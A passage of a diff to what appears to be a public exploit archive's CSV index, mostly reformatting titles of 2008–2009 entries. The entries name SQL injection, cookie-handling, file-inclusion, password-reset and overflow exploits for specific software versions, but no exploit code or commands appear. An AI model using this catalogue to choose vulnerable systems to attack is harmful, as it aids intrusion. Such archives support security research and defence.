Handling",2008-10-31,Hakxer,php,webapps,0 +6891,platforms/php/webapps/6891.txt,"Absolute Form Processor 4.0 - Insecure Cookie Handling",2008-10-31,Hakxer,php,webapps,0 +6892,platforms/php/webapps/6892.txt,"Absolute Live Support 5.1 - Insecure Cookie Handling",2008-10-31,Hakxer,php,webapps,0 +6893,platforms/php/webapps/6893.txt,"Absolute Control Panel XE 1.5 - Insecure Cookie Handling",2008-10-31,Hakxer,php,webapps,0 6894,platforms/php/webapps/6894.txt,"SFS EZ Gaming Directory - (directory.php id) SQL Injection",2008-10-31,Hurley,php,webapps,0 6895,platforms/php/webapps/6895.txt,"SFS EZ Adult Directory - (directory.php id) SQL Injection",2008-10-31,Hurley,php,webapps,0 6896,platforms/php/webapps/6896.txt,"Logz podcast CMS 1.3.1 - (add_url.php art) SQL Injection",2008-10-31,ZoRLu,php,webapps,0 6897,platforms/php/webapps/6897.txt,"cpanel 11.x - XSS / Local File Inclusion",2008-10-31,"Khashayar Fereidani",php,webapps,0 6898,platforms/php/webapps/6898.txt,"U-Mail Webmail 4.91 - (edit.php) Arbitrary File Write",2008-10-31,"Shennan Wang",php,webapps,0 6899,platforms/hardware/remote/6899.txt,"A-Link WL54AP3 and WL54AP2 - CSRF / XSS",2008-10-31,"Henri Lindberg",hardware,remote,0 -6900,platforms/php/webapps/6900.txt,"Absolute News Manager 5.1 Insecure Cookie Handling",2008-10-31,Hakxer,php,webapps,0 +6900,platforms/php/webapps/6900.txt,"Absolute News Manager 5.1 - Insecure Cookie Handling",2008-10-31,Hakxer,php,webapps,0 6901,platforms/php/webapps/6901.txt,"Absolute News Feed 1.0 - Remote Insecure Cookie Handling",2008-10-31,Hakxer,php,webapps,0 -6902,platforms/php/webapps/6902.txt,"Absolute FAQ Manager 6.0 Insecure Cookie Handling",2008-10-31,Hakxer,php,webapps,0 +6902,platforms/php/webapps/6902.txt,"Absolute FAQ Manager 6.0 - Insecure Cookie Handling",2008-10-31,Hakxer,php,webapps,0 6903,platforms/php/webapps/6903.txt,"SFS EZ Hotscripts-like Site (cid) SQL Injection",2008-10-31,TR-ShaRk,php,webapps,0 -6904,platforms/php/webapps/6904.txt,"Absolute Newsletter 6.1 Insecure Cookie Handling",2008-10-31,x0r,php,webapps,0 +6904,platforms/php/webapps/6904.txt,"Absolute Newsletter 6.1 - Insecure Cookie Handling",2008-10-31,x0r,php,webapps,0 6905,platforms/php/webapps/6905.txt,"SFS EZ Hosting Directory (cat_id) SQL Injection",2008-10-31,BeyazKurt,php,webapps,0 6906,platforms/php/webapps/6906.txt,"SFS EZ Gaming Directory (cat_id) SQL Injection",2008-10-31,BeyazKurt,php,webapps,0 6907,platforms/php/webapps/6907.txt,"SFS EZ Home Business Directory (cat_id) SQL Injection",2008-10-31,BeyazKurt,php,webapps,0 6908,platforms/php/webapps/6908.txt,"SFS EZ Link Directory (cat_id) SQL Injection",2008-10-31,BeyazKurt,php,webapps,0 -6909,platforms/php/webapps/6909.txt,"Adult Banner Exchange Website (targetid) SQL Injection",2008-10-31,"Hussin X",php,webapps,0 +6909,platforms/php/webapps/6909.txt,"Adult Banner Exchange Website - (targetid) SQL Injection",2008-10-31,"Hussin X",php,webapps,0 6910,platforms/php/webapps/6910.txt,"SFS EZ BIZ PRO - (track.php id) SQL Injection",2008-10-31,"Hussin X",php,webapps,0 6911,platforms/php/webapps/6911.txt,"SFS EZ Affiliate (cat_id) SQL Injection",2008-10-31,d3b4g,php,webapps,0 6912,platforms/php/webapps/6912.txt,"Article Publisher PRO 1.5 - (SQL Injection) Auth Bypass",2008-10-31,Hakxer,php,webapps,0 @@ -6493,7 +6493,7 @@ id,file,description,date,author,platform,type,port 6926,platforms/windows/dos/6926.pl,"FTP Now 2.6 Server Response Remote Crash PoC",2008-11-01,DeltahackingTEAM,windows,dos,0 6927,platforms/php/webapps/6927.txt,"AJ ARTICLE - (featured_article.php mode) SQL Injection",2008-11-01,Mr.SQL,php,webapps,0 6928,platforms/php/webapps/6928.txt,"Joomla Component Flash Tree Gallery 1.0 - Remote File Inclusion",2008-11-01,NoGe,php,webapps,0 -6929,platforms/php/webapps/6929.txt,"Article Publisher PRO 1.5 Insecure Cookie Handling",2008-11-01,ZoRLu,php,webapps,0 +6929,platforms/php/webapps/6929.txt,"Article Publisher PRO 1.5 - Insecure Cookie Handling",2008-11-01,ZoRLu,php,webapps,0 6930,platforms/php/webapps/6930.txt,"GO4I.NET ASP Forum 1.0 - (forum.asp iFor) SQL Injection",2008-11-01,Bl@ckbe@rD,php,webapps,0 6931,platforms/php/webapps/6931.txt,"YourFreeWorld Programs Rating - (details.php id) SQL Injection",2008-11-01,"Hussin X",php,webapps,0 6932,platforms/php/webapps/6932.txt,"AJ ARTICLE - (SQL Injection) Remote Auth Bypass",2008-11-01,Hakxer,php,webapps,0 @@ -6514,12 +6514,12 @@ id,file,description,date,author,platform,type,port 6947,platforms/php/webapps/6947.txt,"Downline Goldmine Category Addon (id) SQL Injection",2008-11-01,"Hussin X",php,webapps,0 6948,platforms/php/webapps/6948.txt,"YourFreeWorld Classifieds Hosting (id) SQL Injection",2008-11-01,"Hussin X",php,webapps,0 6949,platforms/php/webapps/6949.txt,"YourFreeWorld URL Rotator (id) SQL Injection",2008-11-01,"Hussin X",php,webapps,0 -6950,platforms/php/webapps/6950.txt,"Downline Goldmine paidversion (tr.php id) - SQL Injection",2008-11-02,"Hussin X",php,webapps,0 +6950,platforms/php/webapps/6950.txt,"Downline Goldmine paidversion - (tr.php id) SQL Injection",2008-11-02,"Hussin X",php,webapps,0 6951,platforms/php/webapps/6951.txt,"Downline Goldmine newdownlinebuilder - (tr.php id) SQL Injection",2008-11-02,"Hussin X",php,webapps,0 6952,platforms/php/webapps/6952.txt,"YourFreeWorld Shopping Cart - (index.php c) Blind SQL Injection",2008-11-02,"Hussin X",php,webapps,0 6953,platforms/php/webapps/6953.txt,"Maran PHP Shop - (prod.php cat) SQL Injection",2008-11-02,JosS,php,webapps,0 6954,platforms/php/webapps/6954.txt,"Maran PHP Shop - (admin.php) Insecure Cookie Handling",2008-11-02,JosS,php,webapps,0 -6955,platforms/php/webapps/6955.txt,"Joovili 3.1.4 Insecure Cookie Handling",2008-11-02,ZoRLu,php,webapps,0 +6955,platforms/php/webapps/6955.txt,"Joovili 3.1.4 - Insecure Cookie Handling",2008-11-02,ZoRLu,php,webapps,0 6956,platforms/php/webapps/6956.txt,"apartment search script - (RFU/XSS) Multiple Vulnerabilities",2008-11-02,ZoRLu,php,webapps,0 6957,platforms/php/webapps/6957.txt,"NetRisk 2.0 - XSS / SQL Injection",2008-11-02,StAkeR,php,webapps,0 6958,platforms/php/webapps/6958.txt,"Maran PHP Shop - (prodshow.php) SQL Injection",2008-11-02,d3v1l,php,webapps,0 @@ -6527,11 +6527,11 @@ id,file,description,date,author,platform,type,port 6961,platforms/php/webapps/6961.pl,"DZCP (deV!L_z Clanportal) 1.4.9.6 - Blind SQL Injection Exploit",2008-11-02,anonymous,php,webapps,0 6962,platforms/php/webapps/6962.txt,"BosDev BosClassifieds - (cat_id) SQL Injection",2008-11-03,ZoRLu,php,webapps,0 6963,platforms/windows/remote/6963.html,"Chilkat Crypt - ActiveX Arbitrary File Creation/Execution PoC",2008-11-03,shinnai,windows,remote,0 -6964,platforms/php/webapps/6964.txt,"Acc Real Estate 4.0 Insecure Cookie Handling",2008-11-03,Hakxer,php,webapps,0 -6965,platforms/php/webapps/6965.txt,"Acc Statistics 1.1Insecure Cookie Handling",2008-11-03,Hakxer,php,webapps,0 -6966,platforms/php/webapps/6966.txt,"Acc PHP eMail 1.1 Insecure Cookie Handling",2008-11-03,Hakxer,php,webapps,0 +6964,platforms/php/webapps/6964.txt,"Acc Real Estate 4.0 - Insecure Cookie Handling",2008-11-03,Hakxer,php,webapps,0 +6965,platforms/php/webapps/6965.txt,"Acc Statistics 1.1 - Insecure Cookie Handling",2008-11-03,Hakxer,php,webapps,0 +6966,platforms/php/webapps/6966.txt,"Acc PHP eMail 1.1 - Insecure Cookie Handling",2008-11-03,Hakxer,php,webapps,0 6967,platforms/php/webapps/6967.txt,"MatPo Link 1.2b - (view.php id) SQL Injection",2008-11-03,ZoRLu,php,webapps,0 -6968,platforms/php/webapps/6968.txt,"Acc Autos 4.0 Insecure Cookie Handling",2008-11-03,x0r,php,webapps,0 +6968,platforms/php/webapps/6968.txt,"Acc Autos 4.0 - Insecure Cookie Handling",2008-11-03,x0r,php,webapps,0 6969,platforms/php/webapps/6969.txt,"Apoll 0.7b (SQL Injection) Remote Auth Bypass",2008-11-03,ZoRLu,php,webapps,0 6971,platforms/php/webapps/6971.txt,"MatPo Link 1.2b - (Blind SQL Injection/XSS) Multiple Vulnerabilities",2008-11-03,Hakxer,php,webapps,0 6972,platforms/php/webapps/6972.txt,"pppBlog 0.3.11 - (randompic.php) File Disclosure",2008-11-03,JosS,php,webapps,0 @@ -6671,7 +6671,7 @@ id,file,description,date,author,platform,type,port 7110,platforms/php/webapps/7110.txt,"ScriptsFeed (SF) Real Estate Classifieds Software - File Upload",2008-11-13,ZoRLu,php,webapps,0 7111,platforms/php/webapps/7111.txt,"ScriptsFeed (SF) Auto Classifieds Software - Remote File Upload",2008-11-13,ZoRLu,php,webapps,0 7112,platforms/php/webapps/7112.txt,"ScriptsFeed (SF) Recipes Listing Portal Remote File Upload",2008-11-13,ZoRLu,php,webapps,0 -7113,platforms/php/webapps/7113.txt,"BandSite CMS 1.1.4 Insecure Cookie Handling",2008-11-13,Stack,php,webapps,0 +7113,platforms/php/webapps/7113.txt,"BandSite CMS 1.1.4 - Insecure Cookie Handling",2008-11-13,Stack,php,webapps,0 7114,platforms/php/webapps/7114.txt,"MemHT Portal 4.0.1 - SQL Injection Code Execution Exploit",2008-11-13,Ams,php,webapps,0 7116,platforms/php/webapps/7116.txt,"AlstraSoft Web Host Directory 1.2 - Multiple Vulnerabilities",2008-11-14,G4N0K,php,webapps,0 7117,platforms/php/webapps/7117.txt,"GS Real Estate Portal US/International Module - Multiple Vulnerabilities",2008-11-14,ZoRLu,php,webapps,0 @@ -6691,8 +6691,8 @@ id,file,description,date,author,platform,type,port 7132,platforms/windows/remote/7132.py,"Microsoft Windows Server 2000/2003 - Code Execution Exploit (MS08-067)",2008-11-16,"Debasis Mohanty",windows,remote,445 7133,platforms/php/webapps/7133.txt,"FloSites Blog - Multiple SQL Injection",2008-11-16,Vrs-hCk,php,webapps,0 7134,platforms/php/webapps/7134.txt,"phpstore Wholesale - (track.php?id) SQL Injection",2008-11-16,"Hussin X",php,webapps,0 -7135,platforms/windows/local/7135.htm,"Opera 9.62 file:// Local Heap Overflow Exploit",2008-11-17,"Guido Landi",windows,local,0 -7136,platforms/php/webapps/7136.txt,"mxCamArchive 2.2 Bypass Config Download",2008-11-17,ahmadbady,php,webapps,0 +7135,platforms/windows/local/7135.htm,"Opera 9.62 - file:// Local Heap Overflow Exploit",2008-11-17,"Guido Landi",windows,local,0 +7136,platforms/php/webapps/7136.txt,"mxCamArchive 2.2 - Bypass Config Download",2008-11-17,ahmadbady,php,webapps,0 7137,platforms/asp/webapps/7137.txt,"OpenASP 3.0 - Blind SQL Injection",2008-11-17,StAkeR,asp,webapps,0 7138,platforms/php/webapps/7138.txt,"E-topbiz AdManager 4 - (group) Blind SQL Injection",2008-11-17,"Hussin X",php,webapps,0 7140,platforms/php/webapps/7140.txt,"FREEze Greetings 1.0 - Remote Password Retrieve Exploit",2008-11-17,cOndemned,php,webapps,0 @@ -6704,13 +6704,13 @@ id,file,description,date,author,platform,type,port 7146,platforms/php/webapps/7146.txt,"Simple Customer 1.2 - (Auth Bypass) SQL Injection",2008-11-17,d3b4g,php,webapps,0 7147,platforms/php/webapps/7147.txt,"SaturnCMS (view) Blind SQL Injection",2008-11-17,"Hussin X",php,webapps,0 7148,platforms/php/webapps/7148.txt,"Ultrastats 0.2.144/0.3.11 - (index.php serverid) SQL Injection",2008-11-17,eek,php,webapps,0 -7149,platforms/php/webapps/7149.php,"VideoScript 4.0.1.50 Admin Change Password Exploit",2008-11-17,G4N0K,php,webapps,0 +7149,platforms/php/webapps/7149.php,"VideoScript 4.0.1.50 - Admin Change Password Exploit",2008-11-17,G4N0K,php,webapps,0 7150,platforms/linux/dos/7150.html,"CUPS 1.3.7 - CSRF (add rss subscription) Remote Crash Exploit",2008-11-18,"Adrian ""pagvac"" Pastor",linux,dos,0 7151,platforms/linux/remote/7151.c,"No-IP DUC 2.1.7 - Remote Code Execution Exploit",2008-11-18,XenoMuta,linux,remote,0 7152,platforms/php/webapps/7152.txt,"Musicbox 2.3.8 - (viewalbums.php artistId) SQL Injection",2008-11-18,snakespc,php,webapps,0 7153,platforms/php/webapps/7153.txt,"Pluck CMS 4.5.3 - (g_pcltar_lib_dir) Local File Inclusion",2008-11-18,DSecRG,php,webapps,0 7155,platforms/php/webapps/7155.txt,"Free Directory Script 1.1.1 - (API_HOME_DIR) Remote File Inclusion",2008-11-18,"Ghost Hacker",php,webapps,0 -7156,platforms/php/webapps/7156.txt,"E-topbiz Link Back Checker 1 Insecure Cookie Handling",2008-11-18,x0r,php,webapps,0 +7156,platforms/php/webapps/7156.txt,"E-topbiz Link Back Checker 1 - Insecure Cookie Handling",2008-11-18,x0r,php,webapps,0 7157,platforms/php/webapps/7157.txt,"Alex News-Engine 1.5.1 - Remote Arbitrary File Upload",2008-11-19,Batter,php,webapps,0 7158,platforms/php/webapps/7158.txt,"Alex Article-Engine 1.3.0 - (fckeditor) Arbitrary File Upload",2008-11-19,Batter,php,webapps,0 7159,platforms/php/webapps/7159.php,"PunBB (Private Messaging System 1.2.x) - Multiple LFI Exploit",2008-11-19,StAkeR,php,webapps,0 @@ -6722,7 +6722,7 @@ id,file,description,date,author,platform,type,port 7166,platforms/php/webapps/7166.txt,"AskPert - (Auth bypass) SQL Injection",2008-11-19,TR-ShaRk,php,webapps,0 7167,platforms/windows/remote/7167.html,"Exodus 0.10 - (uri handler) Arbitrary Parameter Injection Exploit",2008-11-20,Nine:Situations:Group,windows,remote,0 7168,platforms/php/webapps/7168.pl,"PunBB Mod PunPortal 0.1 - Local File Inclusion Exploit",2008-11-20,StAkeR,php,webapps,0 -7170,platforms/php/webapps/7170.php,"wPortfolio 0.3 Admin Password Changing Exploit",2008-11-20,G4N0K,php,webapps,0 +7170,platforms/php/webapps/7170.php,"wPortfolio 0.3 - Admin Password Changing Exploit",2008-11-20,G4N0K,php,webapps,0 7171,platforms/multiple/local/7171.txt,"PHP 5.2.6 - (error_log) safe_mode Bypass",2008-11-20,SecurityReason,multiple,local,0 7172,platforms/php/webapps/7172.txt,"NatterChat 1.1 - (Auth Bypass) SQL Injection",2008-11-20,Bl@ckbe@rD,php,webapps,0 7173,platforms/php/webapps/7173.php,"PHP-Fusion 7.00.1 - (messages.php) SQL Injection Exploit",2008-11-20,irk4z,php,webapps,0 @@ -6752,7 +6752,7 @@ id,file,description,date,author,platform,type,port 7201,platforms/php/webapps/7201.txt,"PG Roomate Finder Solution (Auth Bypass) SQL Injection",2008-11-23,ZoRLu,php,webapps,0 7202,platforms/php/webapps/7202.txt,"PG Job Site (poll_view_id) Blind SQL Injection",2008-11-23,ZoRLu,php,webapps,0 7204,platforms/php/webapps/7204.txt,"modx CMS 0.9.6.2 - (RFI/XSS) Multiple Vulnerabilities",2008-11-23,RoMaNcYxHaCkEr,php,webapps,0 -7205,platforms/php/webapps/7205.txt,"Goople CMS 1.7 Insecure Cookie Handling",2008-11-23,BeyazKurt,php,webapps,0 +7205,platforms/php/webapps/7205.txt,"Goople CMS 1.7 - Insecure Cookie Handling",2008-11-23,BeyazKurt,php,webapps,0 7206,platforms/php/webapps/7206.txt,"PHP Classifieds Script Remote Database Disclosure",2008-11-23,InjEctOr5,php,webapps,0 7207,platforms/windows/dos/7207.pl,"Nero ShowTime 5.0.15.0 m3u Playlist File Remote Buffer Overflow PoC",2008-11-24,LiquidWorm,windows,dos,0 7208,platforms/php/webapps/7208.txt,"NetArtMedia Real Estate Portal 1.2 - (ad_id) SQL Injection",2008-11-24,"Hussin X",php,webapps,0 @@ -6786,9 +6786,9 @@ id,file,description,date,author,platform,type,port 7236,platforms/php/webapps/7236.txt,"WebStudio CMS - (pageid) Remote Blind SQL Injection (mil mixup)",2008-11-26,"BorN To K!LL",php,webapps,0 7237,platforms/php/webapps/7237.txt,"CMS Ortus 1.13 - SQL Injection",2008-11-26,otmorozok428,php,webapps,0 7238,platforms/php/webapps/7238.txt,"Post Affiliate Pro 3 - (umprof_status) Blind SQL Injection",2008-11-26,XaDoS,php,webapps,0 -7239,platforms/php/webapps/7239.txt,"ParsBlogger (blog.asp wr) - SQL Injection",2008-11-26,"BorN To K!LL",php,webapps,0 +7239,platforms/php/webapps/7239.txt,"ParsBlogger - (blog.asp wr) SQL Injection",2008-11-26,"BorN To K!LL",php,webapps,0 7240,platforms/php/webapps/7240.txt,"Star Articles 6.0 - Remote Blind SQL Injection",2008-11-26,b3hz4d,php,webapps,0 -7241,platforms/php/webapps/7241.txt,"TxtBlog (index.php m) 1.0 Alpha - Local File Inclusion",2008-11-27,"CWH Underground",php,webapps,0 +7241,platforms/php/webapps/7241.txt,"TxtBlog 1.0 Alpha - (index.php m) Local File Inclusion",2008-11-27,"CWH Underground",php,webapps,0 7242,platforms/php/webapps/7242.txt,"web calendar system 3.12/3.30 - Multiple Vulnerabilities",2008-11-27,Bl@ckbe@rD,php,webapps,0 7243,platforms/php/webapps/7243.php,"Star Articles 6.0 - Remote Blind SQL Injection Exploit",2008-11-27,Stack,php,webapps,0 7244,platforms/php/webapps/7244.txt,"Ocean12 Contact Manager Pro - (SQL/XSS/DDV) Multiple Vulnerabilities",2008-11-27,Pouya_Server,php,webapps,0 @@ -6815,7 +6815,7 @@ id,file,description,date,author,platform,type,port 7266,platforms/php/webapps/7266.pl,"All Club CMS 0.0.2 - Remote DB Config Retrieve Exploit",2008-11-28,StAkeR,php,webapps,0 7267,platforms/php/webapps/7267.txt,"SailPlanner 0.3a (Auth Bypass) SQL Injection",2008-11-28,JIKO,php,webapps,0 7268,platforms/php/webapps/7268.txt,"Bluo CMS 1.2 - (index.php id) Blind SQL Injection",2008-11-28,The_5p3ctrum,php,webapps,0 -7269,platforms/php/webapps/7269.pl,"CMS little (index.php term) 0.0.1 - SQL Injection Exploit",2008-11-28,"CWH Underground",php,webapps,0 +7269,platforms/php/webapps/7269.pl,"CMS little 0.0.1 - (index.php term) SQL Injection Exploit",2008-11-28,"CWH Underground",php,webapps,0 7270,platforms/php/webapps/7270.txt,"ReVou Twitter Clone (Auth Bypass) SQL Injection",2008-11-28,R3d-D3V!L,php,webapps,0 7271,platforms/php/webapps/7271.txt,"Ocean12 FAQ Manager Pro (ID) - Blind SQL Injection",2008-11-28,Stack,php,webapps,0 7273,platforms/asp/webapps/7273.txt,"Active Force Matrix 2 - (Auth Bypass) SQL Injection",2008-11-29,R3d-D3V!L,asp,webapps,0 @@ -6889,14 +6889,14 @@ id,file,description,date,author,platform,type,port 7344,platforms/php/webapps/7344.txt,"Gravity GTD 0.4.5 - (rpc.php objectname) LFI/RCE",2008-12-04,dun,php,webapps,0 7345,platforms/php/webapps/7345.txt,"BNCwi 1.04 - Local File Inclusion",2008-12-04,dun,php,webapps,0 7346,platforms/php/webapps/7346.txt,"Multiple Membership Script 2.5 - (id) SQL Injection",2008-12-05,ViRuS_HaCkErS,php,webapps,0 -7347,platforms/windows/local/7347.pl,"PEiD 0.92 Malformed PE File Universal Buffer Overflow Exploit",2008-12-05,SkD,windows,local,0 +7347,platforms/windows/local/7347.pl,"PEiD 0.92 - Malformed PE File Universal Buffer Overflow Exploit",2008-12-05,SkD,windows,local,0 7348,platforms/asp/webapps/7348.txt,"merlix educate servert - (bypass/DD) Multiple Vulnerabilities",2008-12-05,ZoRLu,asp,webapps,0 7349,platforms/asp/webapps/7349.txt,"RankEm - (rankup.asp siteID) SQL Injection",2008-12-05,AlpHaNiX,asp,webapps,0 7350,platforms/asp/webapps/7350.txt,"RankEm (auth bypass) SQL Injection",2008-12-05,AlpHaNiX,asp,webapps,0 7351,platforms/php/webapps/7351.txt,"nightfall personal diary 1.0 - (XSS/DD) Multiple Vulnerabilities",2008-12-05,AlpHaNiX,php,webapps,0 7352,platforms/php/webapps/7352.txt,"Merlix Teamworx Server - (DD/Bypass) Multiple Remote Vulnerabilities",2008-12-05,ZoRLu,php,webapps,0 7353,platforms/asp/webapps/7353.txt,"Cold BBS - (cforum.mdb) Remote Database Disclosure",2008-12-05,ahmadbady,asp,webapps,0 -7354,platforms/php/webapps/7354.txt,"Tizag Countdown Creator .v.3 Insecure Upload",2008-12-05,ahmadbady,php,webapps,0 +7354,platforms/php/webapps/7354.txt,"Tizag Countdown Creator .v.3 - Insecure Upload",2008-12-05,ahmadbady,php,webapps,0 7355,platforms/windows/remote/7355.txt,"NULL FTP Server 1.1.0.7 - SITE Parameters Command Injection",2008-12-05,"Tan Chew Keong",windows,remote,0 7356,platforms/asp/webapps/7356.txt,"asp autodealer - (SQL/DD) Multiple Vulnerabilities",2008-12-05,AlpHaNiX,asp,webapps,0 7357,platforms/asp/webapps/7357.txt,"ASP PORTAL - Multiple SQL Injection",2008-12-05,AlpHaNiX,asp,webapps,0 @@ -6907,8 +6907,8 @@ id,file,description,date,author,platform,type,port 7362,platforms/windows/dos/7362.py,"DesignWorks Professional 4.3.1 - Local .CCT File Stack BoF PoC",2008-12-06,Cnaph,windows,dos,0 7363,platforms/php/webapps/7363.txt,"phpPgAdmin 4.2.1 - (_language) Local File Inclusion",2008-12-06,dun,php,webapps,0 7364,platforms/php/webapps/7364.php,"IPNPro3 <= 1.44 - Admin Password Changing Exploit",2008-12-07,G4N0K,php,webapps,0 -7365,platforms/php/webapps/7365.php,"DL PayCart 1.34 Admin Password Changing Exploit",2008-12-07,G4N0K,php,webapps,0 -7366,platforms/php/webapps/7366.php,"Bonza Cart 1.10 Admin Password Changing Exploit",2008-12-07,G4N0K,php,webapps,0 +7365,platforms/php/webapps/7365.php,"DL PayCart 1.34 - Admin Password Changing Exploit",2008-12-07,G4N0K,php,webapps,0 +7366,platforms/php/webapps/7366.php,"Bonza Cart 1.10 - Admin Password Changing Exploit",2008-12-07,G4N0K,php,webapps,0 7367,platforms/php/webapps/7367.php,"PayPal eStore Admin Password Changing Exploit",2008-12-07,G4N0K,php,webapps,0 7368,platforms/php/webapps/7368.txt,"Product Sale Framework 0.1b (forum_topic_id) SQL Injection",2008-12-07,b3hz4d,php,webapps,0 7369,platforms/php/webapps/7369.pl,"w3blabor CMS 3.0.5 - Arbitrary File Upload & LFI Exploit",2008-12-07,DNX,php,webapps,0 @@ -7053,12 +7053,12 @@ id,file,description,date,author,platform,type,port 7510,platforms/php/webapps/7510.txt,"2532/Gigs 1.2.2 Stable - Multiple Vulnerabilities",2008-12-18,Osirys,php,webapps,0 7511,platforms/php/webapps/7511.txt,"2532/Gigs 1.2.2 Stable - Remote Login Bypass",2008-12-18,StAkeR,php,webapps,0 7512,platforms/php/webapps/7512.php,"2532/Gigs 1.2.2 Stable - Remote Command Execution Exploit",2008-12-18,StAkeR,php,webapps,0 -7513,platforms/php/webapps/7513.txt,"Calendar Script 1.1 Insecure Cookie Handling",2008-12-18,Osirys,php,webapps,0 +7513,platforms/php/webapps/7513.txt,"Calendar Script 1.1 - Insecure Cookie Handling",2008-12-18,Osirys,php,webapps,0 7514,platforms/php/webapps/7514.txt,"I-Rater Basic - (messages.php) SQL Injection",2008-12-18,boom3rang,php,webapps,0 7515,platforms/php/webapps/7515.txt,"phpclanwebsite 1.23.3 fix pack #5 - Multiple Vulnerabilities",2008-12-18,s4avrd0w,php,webapps,0 7516,platforms/windows/local/7516.txt,"ESET Smart Security 3.0.672 - (epfw.sys) Privilege Escalation Exploit",2008-12-18,"NT Internals",windows,local,0 7517,platforms/php/webapps/7517.txt,"Injader CMS 2.1.1 - (id) SQL Injection",2008-12-18,fuzion,php,webapps,0 -7518,platforms/php/webapps/7518.txt,"Gobbl CMS 1.0 Insecure Cookie Handling",2008-12-18,x0r,php,webapps,0 +7518,platforms/php/webapps/7518.txt,"Gobbl CMS 1.0 - Insecure Cookie Handling",2008-12-18,x0r,php,webapps,0 7519,platforms/php/webapps/7519.txt,"MyPHPsite - (index.php mod) Local File Inclusion",2008-12-18,Piker,php,webapps,0 7520,platforms/multiple/dos/7520.c,"Avahi < 0.6.24 - (mDNS Daemon) Remote Denial of Service",2008-12-19,"Jon Oberheide",multiple,dos,0 7521,platforms/windows/remote/7521.txt,"webcamXP 5.3.2.375 - Remote File Disclosure",2008-12-19,nicx0,windows,remote,0 @@ -7134,16 +7134,16 @@ id,file,description,date,author,platform,type,port 7594,platforms/windows/remote/7594.html,"Chilkat FTP ActiveX (SaveLastError) Insecure Method Exploit",2008-12-28,callAX,windows,remote,0 7595,platforms/php/webapps/7595.txt,"FubarForum 1.6 - Arbitrary Admin Bypass",2008-12-28,k3yv4n,php,webapps,0 7596,platforms/php/webapps/7596.txt,"AlstraSoft Web Email Script Enterprise - (id) SQL Injection",2008-12-28,Bgh7,php,webapps,0 -7597,platforms/php/webapps/7597.txt,"OwenPoll 1.0 Insecure Cookie Handling",2008-12-28,Osirys,php,webapps,0 +7597,platforms/php/webapps/7597.txt,"OwenPoll 1.0 - Insecure Cookie Handling",2008-12-28,Osirys,php,webapps,0 7598,platforms/php/webapps/7598.txt,"PHP-Fusion Mod TI (id) SQL Injection",2008-12-28,"Khashayar Fereidani",php,webapps,0 7599,platforms/asp/webapps/7599.txt,"ForumApp 3.3 - Remote Database Disclosure",2008-12-28,Cyber.Zer0,asp,webapps,0 7600,platforms/php/webapps/7600.pl,"Flexphplink Pro Arbitrary File Upload Exploit",2008-12-28,Osirys,php,webapps,0 -7601,platforms/php/webapps/7601.txt,"Silentum LoginSys 1.0.0 Insecure Cookie Handling",2008-12-28,Osirys,php,webapps,0 +7601,platforms/php/webapps/7601.txt,"Silentum LoginSys 1.0.0 - Insecure Cookie Handling",2008-12-28,Osirys,php,webapps,0 7602,platforms/php/webapps/7602.txt,"webClassifieds 2005 - (Auth Bypass) SQL Injection",2008-12-29,AnGeL25dZ,php,webapps,0 7603,platforms/php/webapps/7603.txt,"eDNews 2.0 - (lg) Local File Inclusion",2008-12-29,GoLd_M,php,webapps,0 7604,platforms/php/webapps/7604.txt,"eDContainer 2.22 - (lg) Local File Inclusion",2008-12-29,GoLd_M,php,webapps,0 7605,platforms/php/webapps/7605.php,"TaskDriver 1.3 - Remote Change Admin Password Exploit",2008-12-29,cOndemned,php,webapps,0 -7606,platforms/php/webapps/7606.txt,"FubarForum 1.6 Admin Bypass Change User Password",2008-12-29,R31P0l,php,webapps,0 +7606,platforms/php/webapps/7606.txt,"FubarForum 1.6 - Admin Bypass Change User Password",2008-12-29,R31P0l,php,webapps,0 7607,platforms/php/webapps/7607.pl,"Ultimate PHP Board 2.2.1 - (log inj) Privilege Escalation Exploit",2008-12-29,StAkeR,php,webapps,0 7608,platforms/windows/local/7608.py,"IntelliTamper 2.07/2.08 - (ProxyLogin) Local Stack Overflow Exploit",2008-12-29,His0k4,windows,local,0 7609,platforms/asp/webapps/7609.txt,"Sepcity Shopping Mall - (shpdetails.asp ID) SQL Injection",2008-12-29,Osmanizim,asp,webapps,0 @@ -7159,7 +7159,7 @@ id,file,description,date,author,platform,type,port 7619,platforms/php/webapps/7619.txt,"eDNews 2.0 - (eDNews_view.php newsid) SQL Injection",2008-12-29,"Virangar Security",php,webapps,0 7620,platforms/php/webapps/7620.txt,"ThePortal 2.2 - Arbitrary Remote File Upload Exploit",2008-12-29,siurek22,php,webapps,0 7621,platforms/php/webapps/7621.txt,"PHPAlumni - (Acomment.php id) SQL Injection",2008-12-29,Mr.SQL,php,webapps,0 -7622,platforms/php/webapps/7622.txt,"Flexcustomer 0.0.6 Admin Login Bypass / Possible PHP code writing",2008-12-29,Osirys,php,webapps,0 +7622,platforms/php/webapps/7622.txt,"Flexcustomer 0.0.6 - Admin Login Bypass / Possible PHP code writing",2008-12-29,Osirys,php,webapps,0 7623,platforms/windows/remote/7623.html,"Megacubo 5.0.7 - (mega://) Remote eval() Injection Exploit",2008-12-30,Nine:Situations:Group,windows,remote,0 7624,platforms/php/webapps/7624.txt,"Flexphpic 0.0.x - (Auth Bypass) SQL Injection",2008-12-30,S.W.A.T.,php,webapps,0 7625,platforms/php/webapps/7625.txt,"CMScout 2.06 - SQL Injection/Local File Inclusion",2008-12-30,SirGod,php,webapps,0 @@ -7170,7 +7170,7 @@ id,file,description,date,author,platform,type,port 7630,platforms/windows/remote/7630.html,"Megacubo 5.0.7 - (mega://) Remote File Download and Execute Exploit",2009-01-01,JJunior,windows,remote,0 7631,platforms/php/webapps/7631.txt,"2Capsule - (sticker.php id) SQL Injection",2009-01-01,Zenith,php,webapps,0 7632,platforms/hardware/dos/7632.txt,"Nokia S60 SMS/MMS (Curse of Silence) - Denial of Service",2009-01-01,"Tobias Engel",hardware,dos,0 -7633,platforms/php/webapps/7633.txt,"EggBlog 3.1.10 Change Admin Pass CSRF",2009-01-01,x0r,php,webapps,0 +7633,platforms/php/webapps/7633.txt,"EggBlog 3.1.10 - Change Admin Pass CSRF",2009-01-01,x0r,php,webapps,0 7634,platforms/windows/dos/7634.pl,"Audacity 1.2.6 - (.gro) Local Buffer Overflow PoC",2009-01-01,Houssamix,windows,dos,0 7635,platforms/php/webapps/7635.txt,"ASPThai.Net Webboard 6.0 - (bview.asp) SQL Injection",2009-01-01,DaiMon,php,webapps,0 7636,platforms/php/webapps/7636.pl,"PHPFootball 1.6 - (filter.php) Remote Hash Disclosure Exploit",2009-01-01,KinG-LioN,php,webapps,0 @@ 